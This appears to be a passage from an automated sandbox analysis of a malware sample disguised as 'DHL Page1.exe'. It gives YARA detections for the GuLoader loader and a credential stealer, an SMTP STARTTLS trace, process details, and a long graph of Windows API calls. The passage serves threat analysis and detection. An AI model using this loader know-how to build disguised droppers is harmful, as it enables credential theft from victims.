                                            Aug 29, 2024 12:24:54.140108109 CEST49844587192.168.11.20172.253.62.108STARTTLS
                                            Aug 29, 2024 12:24:54.265098095 CEST58749844172.253.62.108192.168.11.20220 2.0.0 Ready to start TLS

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:06:22:44
                                            Start date:29/08/2024
                                            Path:C:\Users\user\Desktop\DHL Page1.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\DHL Page1.exe"
                                            Imagebase:0x400000
                                            File size:909'168 bytes
                                            MD5 hash:E563153089B05A25E30DB0A73E196B10
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.123227921774.0000000007E0B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:4
                                            Start time:06:24:33
                                            Start date:29/08/2024
                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\DHL Page1.exe"
                                            Imagebase:0x5b0000
                                            File size:516'608 bytes
                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.127076986570.00000000377C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:24.7%
                                              Dynamic/Decrypted Code Coverage:13.9%
                                              Signature Coverage:20.9%
                                              Total number of Nodes:1518
                                              Total number of Limit Nodes:42
                                              execution_graph 4831 10001000 4834 1000101b 4831->4834 4841 10001516 4834->4841 4836 10001020 4837 10001024 4836->4837 4838 10001027 GlobalAlloc 4836->4838 4839 1000153d 3 API calls 4837->4839 4838->4837 4840 10001019 4839->4840 4843 1000151c 4841->4843 4842 10001522 4842->4836 4843->4842 4844 1000152e GlobalFree 4843->4844 4844->4836 3698 4015c1 3717 402c53 3698->3717 3702 401631 3704 401663 3702->3704 3705 401636 3702->3705 3707 401423 25 API calls 3704->3707 3741 401423 3705->3741 3714 40165b 3707->3714 3712 40164a SetCurrentDirectoryW 3712->3714 3713 401617 GetFileAttributesW 3715 4015d1 3713->3715 3715->3702 3715->3713 3729 405c15 3715->3729 3733 4058fc 3715->3733 3736 405862 CreateDirectoryW 3715->3736 3745 4058df CreateDirectoryW 3715->3745 3718 402c5f 3717->3718 3748 406256 3718->3748 3721 4015c8 3723 405c93 CharNextW CharNextW 3721->3723 3724 405cb0 3723->3724 3726 405cc2 3723->3726 3725 405cbd CharNextW 3724->3725 3724->3726 3728 405ce6 3725->3728 3727 405c15 CharNextW 3726->3727 3726->3728 3727->3726 3728->3715 3730 405c1b 3729->3730 3731 405c31 3730->3731 3732 405c22 CharNextW 3730->3732 3731->3715 3732->3730 3783 40660e GetModuleHandleA 3733->3783 3737 4058b3 GetLastError 3736->3737 3738 4058af 3736->3738 3737->3738 3739 4058c2 SetFileSecurityW 3737->3739 3738->3715 3739->3738 3740 4058d8 GetLastError 3739->3740 3740->3738 3792 405393 3741->3792 3744 406234 lstrcpynW 3744->3712 3746 4058f3 GetLastError 3745->3746 3747 4058ef 3745->3747 3746->3747 3747->3715 3759 406263 3748->3759 3749 4064ae 3750 402c80 3749->3750 3782 406234 lstrcpynW 3749->3782 3750->3721 3766 4064c8 3750->3766 3752 406316 GetVersion 3752->3759 3753 40647c lstrlenW 3753->3759 3755 406256 10 API calls 3755->3753 3758 406391 GetSystemDirectoryW 3758->3759 3759->3749 3759->3752 3759->3753 3759->3755 3759->3758 3760 4063a4 GetWindowsDirectoryW 3759->3760 3761 4064c8 5 API calls 3759->3761 3762 406256 10 API calls 3759->3762 3763 40641d lstrcatW 3759->3763 3764 4063d8 SHGetSpecialFolderLocation 3759->3764 3775 406101 RegOpenKeyExW 3759->3775 3780 40617b wsprintfW 3759->3780 3781 406234 lstrcpynW 3759->3781 3760->3759 3761->3759 3762->3759 3763->3759 3764->3759 3765 4063f0 SHGetPathFromIDListW CoTaskMemFree 3764->3765 3765->3759 3767 4064d5 3766->3767 3769 40653e CharNextW 3767->3769 3770 405c15 CharNextW 3767->3770 3771 40654b 3767->3771 3773 40652a CharNextW 3767->3773 3774 406539 CharNextW 3767->3774 3768 406550 CharPrevW 3768->3771 3769->3767 3769->3771 3770->3767 3771->3768 3772 406571 3771->3772 3772->3721 3773->3767 3774->3769 3776 406175 3775->3776 3777 406135 RegQueryValueExW 3775->3777 3776->3759 3778 406156 RegCloseKey 3777->3778 3778->3776 3780->3759 3781->3759 3782->3750 3784 406634 GetProcAddress 3783->3784 3785 40662a 3783->3785 3786 405903 3784->3786 3789 40659e GetSystemDirectoryW 3785->3789 3786->3715 3788 406630 3788->3784 3788->3786 3790 4065c0 wsprintfW LoadLibraryExW 3789->3790 3790->3788 3793 4053ae 3792->3793 3801 401431 3792->3801 3794 4053ca lstrlenW 3793->3794 3795 406256 18 API calls 3793->3795 3796 4053f3 3794->3796 3797 4053d8 lstrlenW 3794->3797 3795->3794 3799 405406 3796->3799 3800 4053f9 SetWindowTextW 3796->3800 3798 4053ea lstrcatW 3797->3798 3797->3801 3798->3796 3799->3801 3802 40540c SendMessageW SendMessageW SendMessageW 3799->3802 3800->3799 3801->3744 3802->3801 3803 401941 3804 401943 3803->3804 3805 402c53 18 API calls 3804->3805 3806 401948 3805->3806 3809 405a25 3806->3809 3848 405cf0 3809->3848 3812 405a64 3815 405b84 3812->3815 3862 406234 lstrcpynW 3812->3862 3813 405a4d DeleteFileW 3819 401951 3813->3819 3815->3819 3880 406577 FindFirstFileW 3815->3880 3816 405a8a 3817 405a90 lstrcatW 3816->3817 3818 405a9d 3816->3818 3820 405aa3 3817->3820 3863 405c34 lstrlenW 3818->3863 3823 405ab3 lstrcatW 3820->3823 3825 405abe lstrlenW FindFirstFileW 3820->3825 3823->3825 3825->3815 3833 405ae0 3825->3833 3826 405bad 3883 405be8 lstrlenW CharPrevW 3826->3883 3829 405b67 FindNextFileW 3829->3833 3834 405b7d FindClose 3829->3834 3830 4059dd 5 API calls 3832 405bbf 3830->3832 3835 405bc3 3832->3835 3836 405bd9 3832->3836 3833->3829 3846 405b28 3833->3846 3867 406234 lstrcpynW 3833->3867 3834->3815 3835->3819 3840 405393 25 API calls 3835->3840 3838 405393 25 API calls 3836->3838 3838->3819 3839 405a25 62 API calls 3839->3846 3841 405bd0 3840->3841 3842 4060d5 38 API calls 3841->3842 3844 405bd7 3842->3844 3843 405393 25 API calls 3843->3829 3844->3819 3845 405393 25 API calls 3845->3846 3846->3829 3846->3839 3846->3843 3846->3845 3868 4059dd 3846->3868 3876 4060d5 MoveFileExW 3846->3876 3886 406234 lstrcpynW 3848->3886 3850 405d01 3851 405c93 4 API calls 3850->3851 3852 405d07 3851->3852 3853 405a45 3852->3853 3854 4064c8 5 API calls 3852->3854 3853->3812 3853->3813 3860 405d17 3854->3860 3855 405d48 lstrlenW 3856 405d53 3855->3856 3855->3860 3858 405be8 3 API calls 3856->3858 3857 406577 2 API calls 3857->3860 3859 405d58 GetFileAttributesW 3858->3859 3859->3853 3860->3853 3860->3855 3860->3857 3861 405c34 2 API calls 3860->3861 3861->3855 3862->3816 3864 405c42 3863->3864 3865 405c54 3864->3865 3866 405c48 CharPrevW 3864->3866 3865->3820 3866->3864 3866->3865 3867->3833 3887 405de4 GetFileAttributesW 3868->3887 3871 405a0a 3871->3846 3872 405a00 DeleteFileW 3874 405a06 3872->3874 3873 4059f8 RemoveDirectoryW 3873->3874 3874->3871 3875 405a16 SetFileAttributesW 3874->3875 3875->3871 3877 4060f6 3876->3877 3878 4060e9 3876->3878 3877->3846 3890 405f63 lstrcpyW 3878->3890 3881 405ba9 3880->3881 3882 40658d FindClose 3880->3882 3881->3819 3881->3826 3882->3881 3884 405c04 lstrcatW 3883->3884 3885 405bb3 3883->3885 3884->3885 3885->3830 3886->3850 3888 4059e9 3887->3888 3889 405df6 SetFileAttributesW 3887->3889 3888->3871 3888->3872 3888->3873 3889->3888 3891 405fb1 GetShortPathNameW 3890->3891 3892 405f8b 3890->3892 3894 4060d0 3891->3894 3895 405fc6 3891->3895 3917 405e09 GetFileAttributesW CreateFileW 3892->3917 3894->3877 3895->3894 3897 405fce wsprintfA 3895->3897 3896 405f95 CloseHandle GetShortPathNameW 3896->3894 3898 405fa9 3896->3898 3899 406256 18 API calls 3897->3899 3898->3891 3898->3894 3900 405ff6 3899->3900 3918 405e09 GetFileAttributesW CreateFileW 3900->3918 3902 406003 3902->3894 3903 406012 GetFileSize GlobalAlloc 3902->3903 3904 406034 3903->3904 3905 4060c9 CloseHandle 3903->3905 3919 405e8c ReadFile 3904->3919 3905->3894 3910 406053 lstrcpyA 3913 406075 3910->3913 3911 406067 3912 405d6e 4 API calls 3911->3912 3912->3913 3914 4060ac SetFilePointer 3913->3914 3926 405ebb WriteFile 3914->3926 3917->3896 3918->3902 3920 405eaa 3919->3920 3920->3905 3921 405d6e lstrlenA 3920->3921 3922 405daf lstrlenA 3921->3922 3923 405db7 3922->3923 3924 405d88 lstrcmpiA 3922->3924 3923->3910 3923->3911 3924->3923 3925 405da6 CharNextA 3924->3925 3925->3922 3927 405ed9 GlobalFree 3926->3927 3927->3905 3928 401e43 3936 402c31 3928->3936 3930 401e49 3931 402c31 18 API calls 3930->3931 3932 401e55 3931->3932 3933 401e61 ShowWindow 3932->3933 3934 401e6c EnableWindow 3932->3934 3935 402adb 3933->3935 3934->3935 3937 406256 18 API calls 3936->3937 3938 402c46 3937->3938 3938->3930 4845 4028c3 4846 402c53 18 API calls 4845->4846 4847 4028d1 4846->4847 4848 4028e7 4847->4848 4849 402c53 18 API calls 4847->4849 4850 405de4 2 API calls 4848->4850 4849->4848 4851 4028ed 4850->4851 4873 405e09 GetFileAttributesW CreateFileW 4851->4873 4853 4028fa 4854 402906 GlobalAlloc 4853->4854 4855 40299d 4853->4855 4856 402994 CloseHandle 4854->4856 4857 40291f 4854->4857 4858 4029a5 DeleteFileW 4855->4858 4859 4029b8 4855->4859 4856->4855 4874 403424 SetFilePointer 4857->4874 4858->4859 4861 402925 4862 40340e ReadFile 4861->4862 4863 40292e GlobalAlloc 4862->4863 4864 402972 4863->4864 4865 40293e 4863->4865 4866 405ebb WriteFile 4864->4866 4867 40319d 41 API calls 4865->4867 4868 40297e GlobalFree 4866->4868 4872 40294b 4867->4872 4869 40319d 41 API calls 4868->4869 4871 402991 4869->4871 4870 402969 GlobalFree 4870->4864 4871->4856 4872->4870 4873->4853 4874->4861 4875 404446 lstrlenW 4876 404465 4875->4876 4877 404467 WideCharToMultiByte 4875->4877 4876->4877 4878 402a4b 4879 402c31 18 API calls 4878->4879 4880 402a51 4879->4880 4881 402a88 4880->4881 4882 4028a1 4880->4882 4884 402a63 4880->4884 4881->4882 4883 406256 18 API calls 4881->4883 4883->4882 4884->4882 4886 40617b wsprintfW 4884->4886 4886->4882 4890 4016cc 4891 402c53 18 API calls 4890->4891 4892 4016d2 GetFullPathNameW 4891->4892 4893 4016ec 4892->4893 4899 40170e 4892->4899 4895 406577 2 API calls 4893->4895 4893->4899 4894 401723 GetShortPathNameW 4897 402adb 4894->4897 4896 4016fe 4895->4896 4896->4899 4900 406234 lstrcpynW 4896->4900 4899->4894 4899->4897 4900->4899 4901 40474c 4902 404782 4901->4902 4903 40475c 4901->4903 4905 40435f 8 API calls 4902->4905 4904 4042f8 19 API calls 4903->4904 4906 404769 SetDlgItemTextW 4904->4906 4907 40478e 4905->4907 4906->4902 4908 401b4d 4909 402c53 18 API calls 4908->4909 4910 401b54 4909->4910 4911 402c31 18 API calls 4910->4911 4912 401b5d wsprintfW 4911->4912 4913 402adb 4912->4913 3977 40234e 3978 402c53 18 API calls 3977->3978 3979 40235d 3978->3979 3980 402c53 18 API calls 3979->3980 3981 402366 3980->3981 3982 402c53 18 API calls 3981->3982 3983 402370 GetPrivateProfileStringW 3982->3983 4914 402851 4915 402859 4914->4915 4916 40285d FindNextFileW 4915->4916 4919 40286f 4915->4919 4917 4028b6 4916->4917 4916->4919 4920 406234 lstrcpynW 4917->4920 4920->4919 4021 4054d2 4022 4054f3 GetDlgItem GetDlgItem GetDlgItem 4021->4022 4023 40567c 4021->4023 4067 40432d SendMessageW 4022->4067 4025 405685 GetDlgItem CreateThread CloseHandle 4023->4025 4026 4056ad 4023->4026 4025->4026 4090 405466 OleInitialize 4025->4090 4028 4056d8 4026->4028 4029 4056c4 ShowWindow ShowWindow 4026->4029 4030 4056fd 4026->4030 4027 405563 4034 40556a GetClientRect GetSystemMetrics SendMessageW SendMessageW 4027->4034 4031 4056e4 4028->4031 4032 405738 4028->4032 4072 40432d SendMessageW 4029->4072 4076 40435f 4030->4076 4036 405712 ShowWindow 4031->4036 4037 4056ec 4031->4037 4032->4030 4043 405746 SendMessageW 4032->4043 4041 4055d8 4034->4041 4042 4055bc SendMessageW SendMessageW 4034->4042 4039 405732 4036->4039 4040 405724 4036->4040 4073 4042d1 4037->4073 4045 4042d1 SendMessageW 4039->4045 4044 405393 25 API calls 4040->4044 4046 4055eb 4041->4046 4047 4055dd SendMessageW 4041->4047 4042->4041 4048 40570b 4043->4048 4049 40575f CreatePopupMenu 4043->4049 4044->4039 4045->4032 4068 4042f8 4046->4068 4047->4046 4050 406256 18 API calls 4049->4050 4052 40576f AppendMenuW 4050->4052 4056 40578c GetWindowRect 4052->4056 4057 40579f TrackPopupMenu 4052->4057 4053 4055fb 4054 405604 ShowWindow 4053->4054 4055 405638 GetDlgItem SendMessageW 4053->4055 4058 405627 4054->4058 4059 40561a ShowWindow 4054->4059 4055->4048 4061 40565f SendMessageW SendMessageW 4055->4061 4056->4057 4057->4048 4060 4057ba 4057->4060 4071 40432d SendMessageW 4058->4071 4059->4058 4062 4057d6 SendMessageW 4060->4062 4061->4048 4062->4062 4063 4057f3 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4062->4063 4065 405818 SendMessageW 4063->4065 4065->4065 4066 405841 GlobalUnlock SetClipboardData CloseClipboard 4065->4066 4066->4048 4067->4027 4069 406256 18 API calls 4068->4069 4070 404303 SetDlgItemTextW 4069->4070 4070->4053 4071->4055 4072->4028 4074 4042d8 4073->4074 4075 4042de SendMessageW 4073->4075 4074->4075 4075->4030 4077 404377 GetWindowLongW 4076->4077 4087 404400 4076->4087 4078 404388 4077->4078 4077->4087 4079 404397 GetSysColor 4078->4079 4080 40439a 4078->4080 4079->4080 4081 4043a0 SetTextColor 4080->4081 4082 4043aa SetBkMode 4080->4082 4081->4082 4083 4043c2 GetSysColor 4082->4083 4084 4043c8 4082->4084 4083->4084 4085 4043d9 4084->4085 4086 4043cf SetBkColor 4084->4086 4085->4087 4088 4043f3 CreateBrushIndirect 4085->4088 4089 4043ec DeleteObject 4085->4089 4086->4085 4087->4048 4088->4087 4089->4088 4097 404344 4090->4097 4092 405489 4096 4054b0 4092->4096 4100 401389 4092->4100 4093 404344 SendMessageW 4094 4054c2 OleUninitialize 4093->4094 4096->4093 4098 40435c 4097->4098 4099 40434d SendMessageW 4097->4099 4098->4092 4099->4098 4102 401390 4100->4102 4101 4013fe 4101->4092 4102->4101 4103 4013cb MulDiv SendMessageW 4102->4103 4103->4102 4104 401ed5 4105 402c53 18 API calls 4104->4105 4106 401edb 4105->4106 4107 405393 25 API calls 4106->4107 4108 401ee5 4107->4108 4122 405914 CreateProcessW 4108->4122 4111 401f4a CloseHandle 4115 4028a1 4111->4115 4112 401efb WaitForSingleObject 4113 401f0d 4112->4113 4114 401f1f GetExitCodeProcess 4113->4114 4125 40664a 4113->4125 4117 401f31 4114->4117 4118 401f3e 4114->4118 4129 40617b wsprintfW 4117->4129 4118->4111 4121 401f3c 4118->4121 4121->4111 4123 401eeb 4122->4123 4124 405947 CloseHandle 4122->4124 4123->4111 4123->4112 4123->4115 4124->4123 4126 406667 PeekMessageW 4125->4126 4127 401f14 WaitForSingleObject 4126->4127 4128 40665d DispatchMessageW 4126->4128 4127->4113 4128->4126 4129->4121 4921 401956 4922 402c53 18 API calls 4921->4922 4923 40195d lstrlenW 4922->4923 4924 4025a8 4923->4924 4130 4014d7 4131 402c31 18 API calls 4130->4131 4132 4014dd Sleep 4131->4132 4134 402adb 4132->4134 4925 401f58 4926 402c53 18 API calls 4925->4926 4927 401f5f 4926->4927 4928 406577 2 API calls 4927->4928 4929 401f65 4928->4929 4931 401f76 4929->4931 4932 40617b wsprintfW 4929->4932 4932->4931 4135 402259 4136 402c53 18 API calls 4135->4136 4137 40225f 4136->4137 4138 402c53 18 API calls 4137->4138 4139 402268 4138->4139 4140 402c53 18 API calls 4139->4140 4141 402271 4140->4141 4142 406577 2 API calls 4141->4142 4143 40227a 4142->4143 4144 40228b lstrlenW lstrlenW 4143->4144 4148 40227e 4143->4148 4146 405393 25 API calls 4144->4146 4145 405393 25 API calls 4149 402286 4145->4149 4147 4022c9 SHFileOperationW 4146->4147 4147->4148 4147->4149 4148->4145 4148->4149 4172 40175c 4173 402c53 18 API calls 4172->4173 4174 401763 4173->4174 4178 405e38 4174->4178 4176 40176a 4177 405e38 2 API calls 4176->4177 4177->4176 4179 405e45 GetTickCount GetTempFileNameW 4178->4179 4180 405e7f 4179->4180 4181 405e7b 4179->4181 4180->4176 4181->4179 4181->4180 4933 4022dd 4934 4022e4 4933->4934 4937 4022f7 4933->4937 4935 406256 18 API calls 4934->4935 4936 4022f1 4935->4936 4938 405979 MessageBoxIndirectW 4936->4938 4938->4937 4939 401563 4940 402a81 4939->4940 4943 40617b wsprintfW 4940->4943 4942 402a86 4943->4942 4944 401968 4945 402c31 18 API calls 4944->4945 4946 40196f 4945->4946 4947 402c31 18 API calls 4946->4947 4948 40197c 4947->4948 4949 402c53 18 API calls 4948->4949 4950 401993 lstrlenW 4949->4950 4952 4019a4 4950->4952 4951 4019e5 4952->4951 4956 406234 lstrcpynW 4952->4956 4954 4019d5 4954->4951 4955 4019da lstrlenW 4954->4955 4955->4951 4956->4954 4957 100018a9 4958 100018cc 4957->4958 4959 100018ff GlobalFree 4958->4959 4960 10001911 4958->4960 4959->4960 4961 10001272 2 API calls 4960->4961 4962 10001a87 GlobalFree GlobalFree 4961->4962 4963 404ae9 4964 404b15 4963->4964 4965 404af9 4963->4965 4966 404b48 4964->4966 4967 404b1b SHGetPathFromIDListW 4964->4967 4974 40595d GetDlgItemTextW 4965->4974 4970 404b32 SendMessageW 4967->4970 4971 404b2b 4967->4971 4969 404b06 SendMessageW 4969->4964 4970->4966 4972 40140b 2 API calls 4971->4972 4972->4970 4974->4969 4274 4023ea 4275 4023f0 4274->4275 4276 402c53 18 API calls 4275->4276 4277 402402 4276->4277 4278 402c53 18 API calls 4277->4278 4279 40240c RegCreateKeyExW 4278->4279 4280 402436 4279->4280 4281 4028a1 4279->4281 4282 402451 4280->4282 4283 402c53 18 API calls 4280->4283 4284 40245d 4282->4284 4286 402c31 18 API calls 4282->4286 4285 402447 lstrlenW 4283->4285 4287 40247c RegSetValueExW 4284->4287 4291 40319d 4284->4291 4285->4282 4286->4284 4289 402492 RegCloseKey 4287->4289 4289->4281 4292 4031c8 4291->4292 4293 4031ac SetFilePointer 4291->4293 4306 4032a5 GetTickCount 4292->4306 4293->4292 4296 403265 4296->4287 4297 405e8c ReadFile 4298 4031e8 4297->4298 4298->4296 4299 4032a5 39 API calls 4298->4299 4300 4031ff 4299->4300 4300->4296 4301 40326b ReadFile 4300->4301 4303 40320e 4300->4303 4301->4296 4303->4296 4304 405e8c ReadFile 4303->4304 4305 405ebb WriteFile 4303->4305 4304->4303 4305->4303 4307 4032d3 4306->4307 4308 4033fd 4306->4308 4318 403424 SetFilePointer 4307->4318 4309 402e33 33 API calls 4308->4309 4312 4031cf 4309->4312 4311 4032de SetFilePointer 4315 403303 4311->4315 4312->4296 4312->4297 4315->4312 4316 405ebb WriteFile 4315->4316 4317 4033de SetFilePointer 4315->4317 4319 40340e 4315->4319 4322 402e33 4315->4322 4316->4315 4317->4308 4318->4311 4320 405e8c ReadFile 4319->4320 4321 403421 4320->4321 4321->4315 4323 402e44 4322->4323 4324 402e5c 4322->4324 4325 402e54 4323->4325 4326 402e4d DestroyWindow 4323->4326 4327 402e64 4324->4327 4328 402e6c GetTickCount 4324->4328 4325->4315 4326->4325 4330 40664a 2 API calls 4327->4330 4328->4325 4329 402e7a 4328->4329 4331 402e82 4329->4331 4332 402eaf CreateDialogParamW ShowWindow 4329->4332 4330->4325 4331->4325 4337 402e17 4331->4337 4332->4325 4334 402e90 wsprintfW 4335 405393 25 API calls 4334->4335 4336 402ead 4335->4336 4336->4325 4338 402e26 4337->4338 4339 402e28 MulDiv 4337->4339 4338->4339 4339->4334 4975 40166a 4976 402c53 18 API calls 4975->4976 4977 401670 4976->4977 4978 406577 2 API calls 4977->4978 4979 401676 4978->4979 4340 40346c SetErrorMode GetVersion 4341 4034a1 4340->4341 4342 4034a7 4340->4342 4343 40660e 5 API calls 4341->4343 4344 40659e 3 API calls 4342->4344 4343->4342 4345 4034bd lstrlenA 4344->4345 4345->4342 4346 4034cd 4345->4346 4347 40660e 5 API calls 4346->4347 4348 4034d5 4347->4348 4349 40660e 5 API calls 4348->4349 4350 4034dc #17 OleInitialize SHGetFileInfoW 4349->4350 4428 406234 lstrcpynW 4350->4428 4352 403519 GetCommandLineW 4429 406234 lstrcpynW 4352->4429 4354 40352b GetModuleHandleW 4355 403543 4354->4355 4356 405c15 CharNextW 4355->4356 4357 403552 CharNextW 4356->4357 4358 40367c GetTempPathW 4357->4358 4365 40356b 4357->4365 4430 40343b 4358->4430 4360 403694 4361 403698 GetWindowsDirectoryW lstrcatW 4360->4361 4362 4036ee DeleteFileW 4360->4362 4366 40343b 12 API calls 4361->4366 4440 402ed5 GetTickCount GetModuleFileNameW 4362->4440 4363 405c15 CharNextW 4363->4365 4365->4363 4370 403667 4365->4370 4372 403665 4365->4372 4368 4036b4 4366->4368 4367 403702 4376 405c15 CharNextW 4367->4376 4410 4037a5 4367->4410 4423 4037b5 4367->4423 4368->4362 4369 4036b8 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4368->4369 4371 40343b 12 API calls 4369->4371 4525 406234 lstrcpynW 4370->4525 4374 4036e6 4371->4374 4372->4358 4374->4362 4374->4423 4393 403721 4376->4393 4379 4038ef 4381 403973 ExitProcess 4379->4381 4382 4038f7 GetCurrentProcess OpenProcessToken 4379->4382 4380 4037cf 4537 405979 4380->4537 4384 403943 4382->4384 4385 40390f LookupPrivilegeValueW AdjustTokenPrivileges 4382->4385 4392 40660e 5 API calls 4384->4392 4385->4384 4387 4037e5 4391 4058fc 5 API calls 4387->4391 4388 40377f 4390 405cf0 18 API calls 4388->4390 4394 40378b 4390->4394 4395 4037ea lstrcatW 4391->4395 4398 40394a 4392->4398 4393->4387 4393->4388 4394->4423 4526 406234 lstrcpynW 4394->4526 4396 403806 lstrcatW lstrcmpiW 4395->4396 4397 4037fb lstrcatW 4395->4397 4401 403822 4396->4401 4396->4423 4397->4396 4399 40395f ExitWindowsEx 4398->4399 4402 40396c 4398->4402 4399->4381 4399->4402 4404 403827 4401->4404 4405 40382e 4401->4405 4406 40140b 2 API calls 4402->4406 4403 40379a 4527 406234 lstrcpynW 4403->4527 4408 405862 4 API calls 4404->4408 4409 4058df 2 API calls 4405->4409 4406->4381 4411 40382c 4408->4411 4412 403833 SetCurrentDirectoryW 4409->4412 4469 403a7d 4410->4469 4411->4412 4413 403843 4412->4413 4414 40384e 4412->4414 4541 406234 lstrcpynW 4413->4541 4542 406234 lstrcpynW 4414->4542 4417 406256 18 API calls 4418 40388d DeleteFileW 4417->4418 4419 40389a CopyFileW 4418->4419 4425 40385c 4418->4425 4419->4425 4420 4038e3 4422 4060d5 38 API calls 4420->4422 4421 4060d5 38 API calls 4421->4425 4422->4423 4528 40398b 4423->4528 4424 406256 18 API calls 4424->4425 4425->4417 4425->4420 4425->4421 4425->4424 4426 405914 2 API calls 4425->4426 4427 4038ce CloseHandle 4425->4427 4426->4425 4427->4425 4428->4352 4429->4354 4431 4064c8 5 API calls 4430->4431 4432 403447 4431->4432 4433 403451 4432->4433 4434 405be8 3 API calls 4432->4434 4433->4360 4435 403459 4434->4435 4436 4058df 2 API calls 4435->4436 4437 40345f 4436->4437 4438 405e38 2 API calls 4437->4438 4439 40346a 4438->4439 4439->4360 4543 405e09 GetFileAttributesW CreateFileW 4440->4543 4442 402f18 4468 402f25 4442->4468 4544 406234 lstrcpynW 4442->4544 4444 402f3b 4445 405c34 2 API calls 4444->4445 4446 402f41 4445->4446 4545 406234 lstrcpynW 4446->4545 4448 402f4c GetFileSize 4449 40304d 4448->4449 4450 402f63 4448->4450 4451 402e33 33 API calls 4449->4451 4450->4449 4453 40340e ReadFile 4450->4453 4455 40310c 4450->4455 4462 402e33 33 API calls 4450->4462 4450->4468 4452 403054 4451->4452 4454 403090 GlobalAlloc 4452->4454 4452->4468 4547 403424 SetFilePointer 4452->4547 4453->4450 4457 405e38 2 API calls 4454->4457 4458 402e33 33 API calls 4455->4458 4460 4030dc CreateFileW 4457->4460 4458->4468 4459 403071 4461 40340e ReadFile 4459->4461 4463 403116 4460->4463 4460->4468 4465 40307c 4461->4465 4462->4450 4546 403424 SetFilePointer 4463->4546 4465->4454 4465->4468 4466 403124 4467 40319d 41 API calls 4466->4467 4467->4468 4468->4367 4470 40660e 5 API calls 4469->4470 4471 403a91 4470->4471 4472 403a97 4471->4472 4473 403aa9 4471->4473 4557 40617b wsprintfW 4472->4557 4474 406101 3 API calls 4473->4474 4475 403ad9 4474->4475 4476 403af8 lstrcatW 4475->4476 4478 406101 3 API calls 4475->4478 4479 403aa7 4476->4479 4478->4476 4548 403d53 4479->4548 4482 405cf0 18 API calls 4483 403b2a 4482->4483 4484 403bbe 4483->4484 4486 406101 3 API calls 4483->4486 4485 405cf0 18 API calls 4484->4485 4488 403bc4 4485->4488 4492 403b5c 4486->4492 4487 403bd4 LoadImageW 4490 403c7a 4487->4490 4491 403bfb RegisterClassW 4487->4491 4488->4487 4489 406256 18 API calls 4488->4489 4489->4487 4494 40140b 2 API calls 4490->4494 4493 403c31 SystemParametersInfoW CreateWindowExW 4491->4493 4524 403c84 4491->4524 4492->4484 4495 403b7d lstrlenW 4492->4495 4496 405c15 CharNextW 4492->4496 4493->4490 4499 403c80 4494->4499 4497 403bb1 4495->4497 4498 403b8b lstrcmpiW 4495->4498 4500 403b7a 4496->4500 4502 405be8 3 API calls 4497->4502 4498->4497 4501 403b9b GetFileAttributesW 4498->4501 4504 403d53 19 API calls 4499->4504 4499->4524 4500->4495 4503 403ba7 4501->4503 4505 403bb7 4502->4505 4503->4497 4506 405c34 2 API calls 4503->4506 4507 403c91 4504->4507 4558 406234 lstrcpynW 4505->4558 4506->4497 4509 403d20 4507->4509 4510 403c9d ShowWindow 4507->4510 4511 405466 5 API calls 4509->4511 4512 40659e 3 API calls 4510->4512 4513 403d26 4511->4513 4514 403cb5 4512->4514 4515 403d42 4513->4515 4516 403d2a 4513->4516 4517 403cc3 GetClassInfoW 4514->4517 4521 40659e 3 API calls 4514->4521 4520 40140b 2 API calls 4515->4520 4523 40140b 2 API calls 4516->4523 4516->4524 4518 403cd7 GetClassInfoW RegisterClassW 4517->4518 4519 403ced DialogBoxParamW 4517->4519 4518->4519 4522 40140b 2 API calls 4519->4522 4520->4524 4521->4517 4522->4524 4523->4524 4524->4423 4525->4372 4526->4403 4527->4410 4529 4039a6 4528->4529 4530 40399c CloseHandle 4528->4530 4531 4039b0 CloseHandle 4529->4531 4532 4039ba 4529->4532 4530->4529 4531->4532 4560 4039e8 4532->4560 4535 405a25 69 API calls 4536 4037be OleUninitialize 4535->4536 4536->4379 4536->4380 4540 40598e 4537->4540 4538 4037dd ExitProcess 4539 4059a2 MessageBoxIndirectW 4539->4538 4540->4538 4540->4539 4541->4414 4542->4425 4543->4442 4544->4444 4545->4448 4546->4466 4547->4459 4549 403d67 4548->4549 4559 40617b wsprintfW 4549->4559 4551 403dd8 4552 406256 18 API calls 4551->4552 4553 403de4 SetWindowTextW 4552->4553 4554 403e00 4553->4554 4555 403b08 4553->4555 4554->4555 4556 406256 18 API calls 4554->4556 4555->4482 4556->4554 4557->4479 4558->4484 4559->4551 4561 4039f6 4560->4561 4562 4039bf 4561->4562 4563 4039fb FreeLibrary GlobalFree 4561->4563 4562->4535 4563->4562 4563->4563 4980 401ced 4981 402c31 18 API calls 4980->4981 4982 401cf3 IsWindow 4981->4982 4983 401a20 4982->4983 4564 40176f 4565 402c53 18 API calls 4564->4565 4566 401776 4565->4566 4567 401796 4566->4567 4568 40179e 4566->4568 4604 406234 lstrcpynW 4567->4604 4605 406234 lstrcpynW 4568->4605 4571 4017a9 4573 405be8 3 API calls 4571->4573 4572 40179c 4575 4064c8 5 API calls 4572->4575 4574 4017af lstrcatW 4573->4574 4574->4572 4592 4017bb 4575->4592 4576 406577 2 API calls 4576->4592 4577 4017f7 4578 405de4 2 API calls 4577->4578 4578->4592 4580 4017cd CompareFileTime 4580->4592 4581 40188d 4583 405393 25 API calls 4581->4583 4582 401864 4584 405393 25 API calls 4582->4584 4593 401879 4582->4593 4585 401897 4583->4585 4584->4593 4586 40319d 41 API calls 4585->4586 4588 4018aa 4586->4588 4587 406234 lstrcpynW 4587->4592 4589 4018be SetFileTime 4588->4589 4591 4018d0 